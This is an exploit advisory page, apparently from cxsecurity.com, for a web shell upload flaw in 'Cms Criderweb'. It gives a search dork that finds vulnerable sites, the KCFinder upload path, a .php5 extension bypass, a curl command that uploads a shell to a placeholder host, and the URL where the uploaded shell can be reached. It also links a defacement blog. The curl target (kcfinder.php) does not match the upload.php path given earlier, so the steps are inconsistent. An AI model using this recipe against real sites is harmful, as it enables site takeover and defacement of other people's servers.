Cms Criderweb Shell Upload Vulnerability

2018.12.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Cms Criderweb Shell Upload Vulnerability Tested On : Ubuntu 18.04 Author : security007 Dork : intext:"Copyright © Criderweb" Exploit : /kcfinder/upload.php Access Shell Page : /userfiles/files/[yourshell.php5] Bypass extension required : .php5 Poc : 1. dorking on search engines 2. Enter the exploit, for example --> http://vuln.com/kcfinder/upload.php 3. if the pop up "unknown error" means vuln 4. open your terminal type -> curl -F "file=@yourshell.php5" http://vuln.com/kcfinder.php 5. Access your shell on -> http://vuln.com/userfiles/files/shell.php5 GREETS: Allah, Problem Cyber Team, Indonesian People

References:

http://defacementsec007.blogspot.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top